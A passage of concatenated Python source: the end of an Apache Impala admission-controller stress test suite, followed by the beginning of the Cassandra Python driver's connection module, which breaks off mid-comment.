indefinitely, the small table scan should finish quickly. # This causes one executor backend to complete quickly, and causes the other one to # hang. vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT' query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \ "tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100" # Amount of time to wait for the query to reach the running state before throwing a # Timeout exception. timeout = 10 handle = self.execute_query_async(query, vector.get_value('exec_option')) try: # Wait for the query to reach the running state (it should never reach the finished # state because of the 'WAIT' debug action), wait for the 'lineitem' scan to # complete, and then validate that one of the executor backends shutdowns and # releases its admitted memory. self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout) sleep(10) # Wait for the 'lineitem' scan to complete assert "NumCompletedBackends: 1 (1)" in self.client.get_runtime_profile(handle) get_num_completed_backends(self.cluster.impalads[0].service, handle.get_handle().id) == 1 mem_admitted = get_mem_admitted_backends_debug_page(self.cluster) num_executor_zero_admitted = 0 for executor_mem_admitted in mem_admitted['executor']: if executor_mem_admitted == 0: num_executor_zero_admitted += 1 assert num_executor_zero_admitted == 1 finally: # Once the query is closed, validate that all backends have shutdown. self.client.close_query(handle) mem_admitted = get_mem_admitted_backends_debug_page(self.cluster) assert mem_admitted['coordinator'] == 0 for executor_mem_admitted in mem_admitted['executor']: assert executor_mem_admitted == 0 class TestAdmissionControllerStress(TestAdmissionControllerBase): """Submits a number of queries (parameterized) with some delay between submissions (parameterized) and the ability to submit to one impalad or many in a round-robin fashion. Each query is submitted on a separate thread. After admission, the query thread will block with the query open and wait for the main thread to notify it to end its query. The query thread can end its query by fetching to the end, cancelling itself, closing itself, or waiting for the query timeout to take effect. Depending on the test parameters a varying number of queries will be admitted, queued, and rejected. After the queries are admitted, the main thread will request each admitted query thread to end its query and allow queued queries to be admitted. The test tracks the state of the admission controller using the metrics from each impalad to do the following: (1) After submitting all queries, the change in metrics for the number of admitted, queued, and rejected requests should sum to the number of queries and that the values are reasonable given the test parameters. (2) While there are running queries: * Request the currently running queries to end and wait for the queries to end. Verify the metric for the number of completed queries. The threads that submitted those queries will keep their connections open until the entire test completes. This verifies that admission control is tied to the end of the query and does not depend on closing the connection. * Check that queued requests are then dequeued and verify using the metric for the number of dequeued requests. The threads that were waiting to submit the query should then insert themselves into a list of currently running queries and then wait for a notification from the main thread. (3) After all queries have completed, check that the final number of admitted, queued, and rejected requests are reasonable given the test parameters. When submitting to a single impalad, we know exactly what the values should be, otherwise we just check that they are within reasonable bounds. """ @classmethod def add_test_dimensions(cls): super(TestAdmissionControllerStress, cls).add_test_dimensions() cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('num_queries', *NUM_QUERIES)) cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION)) cls.ImpalaTestMatrix.add_dimension( ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS)) # Additional constraints for code coverage jobs and core. num_queries = None if ImpalaTestClusterProperties.get_instance().has_code_coverage(): # Code coverage builds can't handle the increased concurrency. num_queries = 15 elif cls.exploration_strategy() == 'core': num_queries = 30 cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('submission_delay_ms') == 0) cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('round_robin_submission')) if num_queries is not None: cls.ImpalaTestMatrix.add_constraint( lambda v: v.get_value('num_queries') == num_queries) def setup(self): # All threads are stored in this list and it's used just to make sure we clean up # properly in teardown. self.all_threads = list() # Each submission thread will append() itself to this list if the query begins # execution. The main thread will access this list to determine which threads are # executing queries that can be cancelled (it will pop() elements from the front of # the list). The individual operations on the list are atomic and thread-safe thanks # to the GIL. self.executing_threads = list() def teardown(self): # Set shutdown for all threads (cancel if needed) for thread in self.all_threads: try: thread.lock.acquire() thread.shutdown = True if thread.query_handle is not None: LOG.debug("Attempt to clean up thread executing query %s (state %s)", thread.query_num, thread.query_state) client = thread.impalad.service.create_beeswax_client() try: client.cancel(thread.query_handle) finally: client.close() finally: thread.lock.release() # Wait for all threads to exit for thread in self.all_threads: thread.join(5) LOG.debug("Join thread for query num %s %s", thread.query_num, "TIMED OUT" if thread.isAlive() else "") def get_admission_metrics(self): """ Returns a map of the admission metrics, aggregated across all of the impalads. The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued', 'rejected', 'released', and 'timed-out'. """ metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0, 'released': 0, 'timed-out': 0} for impalad in self.impalads: keys = [metric_key(self.pool_name, 'total-%s' % short_name) for short_name in metrics.keys()] values = impalad.service.get_metric_values(keys, [0] * len(keys)) for short_name, value in zip(metrics.keys(), values): metrics[short_name] += value return metrics def get_consistent_admission_metrics(self, num_submitted): """Same as get_admission_metrics() except retries until it gets consistent metrics for num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent metrics where a dequeued query is reflected in dequeued but not admitted.""" ATTEMPTS = 5 for i in xrange(ATTEMPTS): metrics = self.get_admission_metrics() admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected'] if admitted_immediately + metrics['dequeued'] == metrics['admitted']: return metrics LOG.info("Got inconsistent metrics {0}".format(metrics)) assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\ "{2}".format(num_submitted, ATTEMPTS, metrics) def wait_for_metric_changes(self, metric_names, initial, expected_delta): """ Waits for the sum of metrics in metric_names to change by at least expected_delta. This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more metrics aggregated across all impalads, e.g. we want to wait for the total number of admitted, queued, and rejected metrics to change some amount in total, but we don't know exactly how the metrics will change individually. 'metric_names' is a list of the keys returned by get_admission_metrics() which are expected to change. 'initial' is the initial set of metrics returned by get_admission_metrics() to compare against. 'expected_delta' is the total change expected across all impalads for the specified metrics. """ log_metrics("wait_for_metric_changes, initial=", initial) current = initial start_time = time() while True: current = self.get_admission_metrics() log_metrics("wait_for_metric_changes, current=", current) deltas = compute_metric_deltas(current, initial) delta_sum = sum([deltas[x] for x in metric_names]) LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)", delta_sum, deltas, expected_delta, metric_names) if delta_sum >= expected_delta: LOG.info("Found all %s metrics after %s seconds", delta_sum, round(time() - start_time, 1)) return (deltas, current) assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting {0} seconds for metrics {1} delta {2} "\ "current {3} initial {4}" .format( STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current), str(initial)) sleep(1) def wait_for_statestore_updates(self, heartbeats): """Waits for a number of admission control statestore updates from all impalads.""" start_time = time() init = dict() curr = dict() for impalad in self.impalads: init[impalad] = impalad.service.get_metric_value( REQUEST_QUEUE_UPDATE_INTERVAL)['count'] curr[impalad] = init[impalad] while True: LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(), init.values(), [curr[i] - init[i] for i in self.impalads]) if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break for impalad in self.impalads: curr[impalad] = impalad.service.get_metric_value( REQUEST_QUEUE_UPDATE_INTERVAL)['count'] assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,) sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000)) LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats) def wait_for_admitted_threads(self, num_threads): """ Wait for query submission threads to update after being admitted, as determined by observing metric changes. This is necessary because the metrics may change before the execute_async() calls on the query threads return and add themselves to self.executing_threads. """ start_time = time() LOG.info("Waiting for %s threads to begin execution", num_threads) # All individual list operations are thread-safe, so we don't need to use a # lock to synchronize before checking the list length (on which another thread # may call append() concurrently). while len(self.executing_threads) < num_threads: assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for " "%s admitted client rpcs to return. Only %s executing " % ( STRESS_TIMEOUT, num_threads, len(self.executing_threads))) sleep(0.1) LOG.info("Found all %s admitted threads after %s seconds", num_threads, round(time() - start_time, 1)) def end_admitted_queries(self, num_queries): """ Requests each admitted query to end its query. """ assert len(self.executing_threads) >= num_queries LOG.info("Requesting {0} clients to end queries".format(num_queries)) # Request admitted clients to end their queries current_executing_queries = [] for i in xrange(num_queries): # pop() is thread-safe, it's OK if another thread is appending concurrently. thread = self.executing_threads.pop(0) LOG.info("Cancelling query %s", thread.query_num) assert thread.query_state == 'ADMITTED' current_executing_queries.append(thread) thread.query_state = 'REQUEST_QUERY_END' # Wait for the queries to end start_time = time() while True: all_done = True for thread in self.all_threads: if thread.query_state == 'REQUEST_QUERY_END': all_done = False if all_done: break assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,) sleep(1) class SubmitQueryThread(threading.Thread): def __init__(self, impalad, additional_query_options, vector, query_num, query_end_behavior, executing_threads): """ executing_threads must be provided so that this thread can add itself when the query is admitted and begins execution. """ super(self.__class__, self).__init__() self.executing_threads = executing_threads self.vector = vector self.additional_query_options = additional_query_options self.query_num = query_num self.query_end_behavior = query_end_behavior self.impalad = impalad self.error = None # query_state is defined and used only by the test code, not a property exposed by # the server self.query_state = 'NOT_SUBMITTED' # lock protects query_handle and shutdown, used by the main thread in teardown() self.lock = threading.RLock() self.query_handle = None self.shutdown = False # Set by the main thread when tearing down def run(self): client = None try: try: # Take the lock while query_handle is being created to avoid an unlikely race # condition with teardown() (i.e. if an error occurs on the main thread), and # check if the test is already shut down. self.lock.acquire() if self.shutdown: return exec_options = self.vector.get_value('exec_option') exec_options.update(self.additional_query_options) query = QUERY.format(self.query_num) self.query_state = 'SUBMITTING' client = self.impalad.service.create_beeswax_client() ImpalaTestSuite.change_database(client, self.vector.get_value('table_format')) client.set_configuration(exec_options) if self.query_end_behavior == 'QUERY_TIMEOUT': client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S)) LOG.info("Submitting query %s", self.query_num) self.query_handle = client.execute_async(query) client.wait_for_admission_control(self.query_handle) admission_result = client.get_admission_result(self.query_handle) assert len(admission_result) > 0 if "Rejected" in admission_result: LOG.info("Rejected query %s", self.query_num) self.query_state = 'REJECTED' self.query_handle = None return elif "Timed out" in admission_result: LOG.info("Query %s timed out", self.query_num) self.query_state = 'TIMED OUT' self.query_handle = None return LOG.info("Admission result for query %s : %s", self.query_num, admission_result) except ImpalaBeeswaxException as e: LOG.exception(e) raise e finally: self.lock.release() LOG.info("Admitted query %s", self.query_num) self.query_state = 'ADMITTED' # The thread becomes visible to the main thread when it is added to the # shared list of executing_threads. append() is atomic and thread-safe. self.executing_threads.append(self) # Synchronize with the main thread. At this point, the thread is executing a # query. It needs to wait until the main thread requests it to end its query. while not self.shutdown: # The QUERY_TIMEOUT needs to stay active until the main thread requests it # to end. Otherwise, the query may get cancelled early. Fetch rows 2 times # per QUERY_TIMEOUT interval to keep the query active. if self.query_end_behavior == 'QUERY_TIMEOUT' and \ self.query_state != 'COMPLETED': fetch_result = client.fetch(query, self.query_handle, 1) assert len(fetch_result.data) == 1, str(fetch_result) if self.query_state == 'REQUEST_QUERY_END': self._end_query(client, query) # The query has released admission control resources self.query_state = 'COMPLETED' self.query_handle = None sleep(QUERY_END_TIMEOUT_S * 0.5) except Exception as e: LOG.exception(e) # Unknown errors will be raised later self.error = e self.query_state = 'ERROR' finally: LOG.info("Thread terminating in state=%s", self.query_state) if client is not None: client.close() def _end_query(self, client, query): """Bring the query to the appropriate end state defined by self.query_end_behaviour. Returns once the query has reached that state.""" LOG.info("Ending query %s by %s", str(self.query_handle.get_handle()), self.query_end_behavior) if self.query_end_behavior == 'QUERY_TIMEOUT': # Sleep and wait for the query to be cancelled. The cancellation will # set the state to EXCEPTION. start_time = time() while (client.get_state(self.query_handle) != client.QUERY_STATES['EXCEPTION']): assert (time() - start_time < STRESS_TIMEOUT),\ "Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,) sleep(1) elif self.query_end_behavior == 'EOS': # Fetch all rows so we hit eos. client.fetch(query, self.query_handle) elif self.query_end_behavior == 'CLIENT_CANCEL': client.cancel(self.query_handle) else: assert self.query_end_behavior == 'CLIENT_CLOSE' client.close_query(self.query_handle) def _check_queries_page_resource_pools(self): """Checks that all queries in the '/queries' webpage json have the correct resource pool (this is called after all queries have been admitted, queued, or rejected, so they should already have the pool set), or no pool for queries that don't go through admission control.""" for impalad in self.impalads: queries_json = impalad.service.get_debug_webpage_json('/queries') for query in itertools.chain(queries_json['in_flight_queries'], queries_json['completed_queries']): if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML': assert query['last_event'] != 'Registered' and \ query['last_event'] != 'Planning finished' assert query['resource_pool'] == self.pool_name else: assert query['resource_pool'] == '' def _get_queries_page_num_queued(self): """Returns the number of queries currently in the 'queued' state from the '/queries' webpage json""" num_queued = 0 for impalad in self.impalads: queries_json = impalad.service.get_debug_webpage_json('/queries') for query in queries_json['in_flight_queries']: if query['last_event'] == 'Queued': num_queued += 1 return num_queued def run_admission_test(self, vector, additional_query_options): LOG.info("Starting test case with parameters: %s", vector) self.impalads = self.cluster.impalads round_robin_submission = vector.get_value('round_robin_submission') submission_delay_ms = vector.get_value('submission_delay_ms') if not round_robin_submission: self.impalads = [self.impalads[0]] num_queries = vector.get_value('num_queries') assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES initial_metrics = self.get_admission_metrics() log_metrics("Initial metrics: ", initial_metrics) for query_num in xrange(num_queries): impalad = self.impalads[query_num % len(self.impalads)] query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)] thread = self.SubmitQueryThread(impalad, additional_query_options, vector, query_num, query_end_behavior, self.executing_threads) thread.start() self.all_threads.append(thread) sleep(submission_delay_ms / 1000.0) # Wait for the admission control to make the initial admission decision for all of # the queries. They should either be admitted immediately, queued, or rejected. # The test query is chosen that it with remain active on all backends until the test # ends the query. This prevents queued queries from being dequeued in the background # without this thread explicitly ending them, so that the test can admit queries in # discrete waves. LOG.info("Wait for initial admission decisions") (metric_deltas, curr_metrics) = self.wait_for_metric_changes( ['admitted', 'queued', 'rejected'], initial_metrics, num_queries) # Also wait for the test threads that submitted the queries to start executing. self.wait_for_admitted_threads(metric_deltas['admitted']) # Check that the admission decisions are reasonable given the test parameters # The number of admitted and queued requests should be at least the configured limits # but less than or equal to those limits times the number of impalads. assert metric_deltas['dequeued'] == 0,\ "Queued queries should not run until others are made to finish" assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\ "Admitted fewer than expected queries" assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\ "Admitted more than expected queries: at least one daemon over-admitted" assert metric_deltas['queued'] >=\ min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\ "Should have queued more queries before rejecting them" assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\ "Queued too many queries: at least one daemon queued too many" assert metric_deltas['rejected'] + metric_deltas['admitted'] +\ metric_deltas['queued'] == num_queries,\ "Initial admission decisions don't add up to {0}: {1}".format( num_queries, str(metric_deltas)) initial_metric_deltas = metric_deltas # Like above, check that the count from the queries webpage json is reasonable. queries_page_num_queued = self._get_queries_page_num_queued() assert queries_page_num_queued >=\ min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES) assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads) self._check_queries_page_resource_pools() # Admit queries in waves until all queries are done. A new wave of admission # is started by killing some of the running queries. while len(self.executing_threads) > 0: curr_metrics = self.get_consistent_admission_metrics(num_queries) log_metrics("Main loop, curr_metrics: ", curr_metrics) num_to_end = len(self.executing_threads) LOG.info("Main loop, will request %s queries to end", num_to_end) self.end_admitted_queries(num_to_end) self.wait_for_metric_changes(['released'], curr_metrics, num_to_end) num_queued_remaining =\ curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out'] expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES) (metric_deltas, _) = self.wait_for_metric_changes( ['admitted', 'timed-out'], curr_metrics, expected_admitted) # The queue timeout is set high for these tests, so we don't expect any queries to # time out. assert metric_deltas['admitted'] >= expected_admitted assert metric_deltas['timed-out'] == 0 self.wait_for_admitted_threads(metric_deltas['admitted']) # Wait a few topic updates to ensure the admission controllers have reached a steady # state or we may find an impalad dequeue more requests after we capture metrics. self.wait_for_statestore_updates(10) final_metrics = self.get_consistent_admission_metrics(num_queries) log_metrics("Final metrics: ", final_metrics) metric_deltas = compute_metric_deltas(final_metrics, initial_metrics) assert metric_deltas['timed-out'] == 0 if round_robin_submission: min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES assert metric_deltas['admitted'] >= min_expected_admitted assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads) assert metric_deltas['admitted'] ==\ initial_metric_deltas['admitted'] + initial_metric_deltas['queued'] assert metric_deltas['queued'] == initial_metric_deltas['queued'] assert metric_deltas['rejected'] == initial_metric_deltas['rejected'] else: # We shouldn't go over the max number of queries or queue size so we can compute # the expected number of queries that should have been admitted (which includes the # number queued as they eventually get admitted as well), queued, and rejected expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES assert metric_deltas['admitted'] == expected_admitted assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES assert metric_deltas['rejected'] == num_queries - expected_admitted # All queries should be completed by now. queries_page_num_queued = self._get_queries_page_num_queued() assert queries_page_num_queued == 0 self._check_queries_page_resource_pools() for thread in self.all_threads: if thread.error is not None: raise thread.error @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES, max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000), statestored_args=_STATESTORED_ARGS) def test_admission_controller_with_flags(self, vector): if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') self.pool_name = 'default-pool' # The pool has no mem resources set, so submitting queries with huge mem_limits # should be fine. This exercises the code that does the per-pool memory # accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled. self.run_admission_test(vector, {'request_pool': self.pool_name, 'mem_limit': sys.maxint}) @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), statestored_args=_STATESTORED_ARGS) def test_admission_controller_with_configs(self, vector): self.pool_name = 'root.queueB' self.run_admission_test(vector, {'request_pool': self.pool_name}) def get_proc_limit(self): """Gets the process mem limit as reported by the impalad's mem-tracker metric. Raises an assertion if not all impalads have the same value.""" limit_metrics = [] for impalad in self.cluster.impalads: limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit")) assert limit_metrics[0] == limit_metrics[-1],\ "Not all impalads have the same process limit: %s" % (limit_metrics,) assert limit_metrics[0] is not None return limit_metrics[0] @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags( max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT, queue_wait_timeout_ms=600000), statestored_args=_STATESTORED_ARGS) def test_mem_limit(self, vector): # Impala may set the proc mem limit lower than we think depending on the overcommit # settings of the OS. It should be fine to continue anyway. proc_limit = self.get_proc_limit() if proc_limit != MEM_TEST_LIMIT: LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit, MEM_TEST_LIMIT) self.pool_name = 'default-pool' # Each query mem limit (set the query option to override the per-host memory # estimate) should use a bit less than (total pool mem limit) / #queries so that # once #queries are running, the total pool mem usage is about at the limit and # additional incoming requests will be rejected. The actual pool limit on the number # of running requests is very high so that requests are only queued/rejected due to # the mem limit. num_impalads = len(self.cluster.impalads) query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1 self.run_admission_test(vector, {'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
connection.py
# Copyright DataStax, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import # to enable import io from stdlib from collections import defaultdict, deque import errno from functools import wraps, partial from heapq import heappush, heappop import io import logging import six from six.moves import range import socket import struct import sys from threading import Thread, Event, RLock import time try: import ssl except ImportError: ssl = None # NOQA if 'gevent.monkey' in sys.modules: from gevent.queue import Queue, Empty else: from six.moves.queue import Queue, Empty # noqa from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion from cassandra.marshal import int32_pack from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage, StartupMessage, ErrorMessage, CredentialsMessage, QueryMessage, ResultMessage, ProtocolHandler, InvalidRequestException, SupportedMessage, AuthResponseMessage, AuthChallengeMessage, AuthSuccessMessage, ProtocolException, RegisterMessage) from cassandra.util import OrderedDict log = logging.getLogger(__name__) # We use an ordered dictionary and specifically add lz4 before # snappy so that lz4 will be preferred. Changing the order of this # will change the compression preferences for the driver. locally_supported_compressions = OrderedDict() try: import lz4 except ImportError: pass else: # The compress and decompress functions we need were moved from the lz4 to # the lz4.block namespace, so we try both here. try: from lz4 import block as lz4_block except ImportError: lz4_block = lz4 try: lz4_block.compress lz4_block.decompress except AttributeError: raise ImportError( 'lz4 not imported correctly. Imported object should have ' '.compress and and .decompress attributes but does not. ' 'Please file a bug report on JIRA. (Imported object was ' '{lz4_block})'.format(lz4_block=repr(lz4_block)) ) # Cassandra writes the uncompressed message length in big endian order, # but the lz4 lib requires little endian order, so we wrap these # functions to handle that def lz4_compress(byts): # write length in big-endian instead of little-endian return int32_pack(len(byts)) + lz4_block.compress(byts)[4:] def lz4_decompress(byts): # flip from big-endian to little-endian return lz4_block.decompress(byts[3::-1] + byts[4:]) locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress) try: import snappy except ImportError: pass else: # work around apparently buggy snappy decompress def decompress(byts): if byts == '\x00': return '' return snappy.decompress(byts) locally_supported_compressions['snappy'] = (snappy.compress, decompress) PROTOCOL_VERSION_MASK = 0x7f HEADER_DIRECTION_FROM_CLIENT = 0x00 HEADER_DIRECTION_TO_CLIENT = 0x80 HEADER_DIRECTION_MASK = 0x80 frame_header_v1_v2 = struct.Struct('>BbBi') frame_header_v3 = struct.Struct('>BhBi') class _Frame(object): def __init__(self, version, flags, stream, opcode, body_offset, end_pos): self.version = version self.flags = flags self.stream = stream self.opcode = opcode self.body_offset = body_offset self.end_pos = end_pos def __eq__(self, other): # facilitates testing if isinstance(other, _Frame): return (self.version == other.version and self.flags == other.flags and self.stream == other.stream and self.opcode == other.opcode and self.body_offset == other.body_offset and self.end_pos == other.end_pos) return NotImplemented def __str__(self): return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset) NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK) class ConnectionException(Exception): """ An unrecoverable error was hit when attempting to use a connection, or the connection was already closed or defunct. """ def __init__(self, message, host=None): Exception.__init__(self, message) self.host = host class ConnectionShutdown(ConnectionException): """ Raised when a connection has been marked as defunct or has been closed. """ pass class ProtocolVersionUnsupported(ConnectionException): """ Server rejected startup message due to unsupported protocol version """ def __init__(self, host, startup_version): msg = "Unsupported protocol version on %s: %d" % (host, startup_version) super(ProtocolVersionUnsupported, self).__init__(msg, host) self.startup_version = startup_version class ConnectionBusy(Exception): """ An attempt was made to send a message through a :class:`.Connection` that was already at the max number of in-flight operations. """ pass class ProtocolError(Exception): """ Communication did not match the protocol that this driver expects. """ pass def defunct_on_error(f): @wraps(f) def wrapper(self, *args, **kwargs): try: return f(self, *args, **kwargs) except Exception as exc: self.defunct(exc) return wrapper DEFAULT_CQL_VERSION = '3.0.0' if six.PY3: def int_from_buf_item(i): return i else: int_from_buf_item = ord class Connection(object): CALLBACK_ERR_THREAD_THRESHOLD = 100 in_buffer_size = 4096 out_buffer_size = 4096 cql_version = None no_compact = False protocol_version = ProtocolVersion.MAX_SUPPORTED keyspace = None compression = True compressor = None decompressor = None ssl_options = None last_error = None # The current number of operations that are in flight. More precisely, # the number of request IDs that are currently in use. in_flight = 0 # Max concurrent requests allowed per connection. This is set optimistically high, allowing # all request ids to be used in protocol version 3+. Normally concurrency would be controlled # at a higher level by the application or concurrent.execute_concurrent. This attribute # is for lower-level integrations that want some upper bound without reimplementing. max_in_flight = 2 ** 15 # A set of available request IDs. When using the v3 protocol or higher, # this will not initially include all request IDs in order to save memory, # but the set will grow if it is exhausted. request_ids = None # Tracks the highest used request ID in order to help with growing the # request_ids set highest_request_id = 0 is_defunct = False is_closed = False lock = None user_type_map = None msg_received = False is_unsupported_proto_version = False is_control_connection = False signaled_error = False # used for flagging at the pool level allow_beta_protocol_version = False _iobuf = None _current_frame = None _socket = None _socket_impl = socket _ssl_impl = ssl _check_hostname = False def __init__(self, host='127.0.0.1', port=9042, authenticator=None, ssl_options=None, sockopts=None, compression=True, cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False, user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False): self.host = host self.port = port self.authenticator = authenticator self.ssl_options = ssl_options.copy() if ssl_options else None self.sockopts = sockopts self.compression = compression self.cql_version = cql_version self.protocol_version = protocol_version self.is_control_connection = is_control_connection self.user_type_map = user_type_map self.connect_timeout = connect_timeout self.allow_beta_protocol_version = allow_beta_protocol_version self.no_compact = no_compact self._push_watchers = defaultdict(set) self._requests = {} self._iobuf = io.BytesIO() if ssl_options: self._check_hostname = bool(self.ssl_options.pop('check_hostname', False)) if self._check_hostname: if not getattr(ssl, 'match_hostname', None): raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. " "Patch or upgrade Python to use this option.") if protocol_version >= 3: self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1) # Don't fill the deque with 2**15 items right away. Start with some and add # more if needed. initial_size = min(300, self.max_in_flight) self.request_ids = deque(range(initial_size)) self.highest_request_id = initial_size - 1 else: self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1) self.request_ids = deque(range(self.max_request_id + 1)) self.highest_request_id = self.max_request_id self.lock = RLock() self.connected_event = Event() @classmethod def initialize_reactor(cls): """ Called once by Cluster.connect(). This should be used by implementations to set up any resources that will be shared across connections. """ pass @classmethod def handle_fork(cls): """ Called after a forking. This should cleanup any remaining reactor state from the parent process. """ pass @classmethod def create_timer(cls, timeout, callback): raise NotImplementedError() @classmethod def factory(cls, host, timeout, *args, **kwargs): """ A factory function which returns connections which have succeeded in connecting and are ready for service (or raises an exception otherwise). """ start = time.time() kwargs['connect_timeout'] = timeout conn = cls(host, *args, **kwargs) elapsed = time.time() - start conn.connected_event.wait(timeout - elapsed) if conn.last_error: if conn.is_unsupported_proto_version: raise ProtocolVersionUnsupported(host, conn.protocol_version) raise conn.last_error elif not conn.connected_event.is_set(): conn.close() raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout) else: return conn def _connect_socket(self): sockerr = None addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM) if not addresses: raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,)) for (af, socktype, proto, canonname, sockaddr) in addresses: try: self._socket = self._socket_impl.socket(af, socktype, proto) if self.ssl_options: if not self._ssl_impl: raise RuntimeError("This version of Python was not compiled with SSL support") self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options) self._socket.settimeout(self.connect_timeout) self._socket.connect(sockaddr) self._socket.settimeout(None) if self._check_hostname: ssl.match_hostname(self._socket.getpeercert(), self.host) sockerr = None break except socket.error as err: if self._socket: self._socket.close() self._socket = None sockerr = err if sockerr: raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr)) if self.sockopts: for args in self.sockopts: self._socket.setsockopt(*args) def close(self): raise NotImplementedError() def defunct(self, exc): with self.lock: if self.is_defunct or self.is_closed: return self.is_defunct = True exc_info = sys.exc_info() # if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message if any(exc_info): log.debug("Defuncting connection (%s) to %s:", id(self), self.host, exc_info=exc_info) else: log.debug("Defuncting connection (%s) to %s: %s", id(self), self.host, exc) self.last_error = exc self.close() self.error_all_requests(exc) self.connected_event.set() return exc def error_all_requests(self, exc): with self.lock: requests = self._requests self._requests = {} if not requests: return new_exc = ConnectionShutdown(str(exc)) def try_callback(cb): try: cb(new_exc) except Exception: log.warning("Ignoring unhandled exception while erroring requests for a " "failed connection (%s) to host %s:", id(self), self.host, exc_info=True) # run first callback from this thread to ensure pool state before leaving cb, _, _ = requests.popitem()[1] try_callback(cb) if not requests: return # additional requests are optionally errored from a separate thread # The default callback and retry logic is fairly expensive -- we don't # want to tie up the event thread when there are many requests def err_all_callbacks(): for cb, _, _ in requests.values(): try_callback(cb) if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD: err_all_callbacks() else: # daemon thread here because we want to stay decoupled from the cluster TPE # TODO: would it 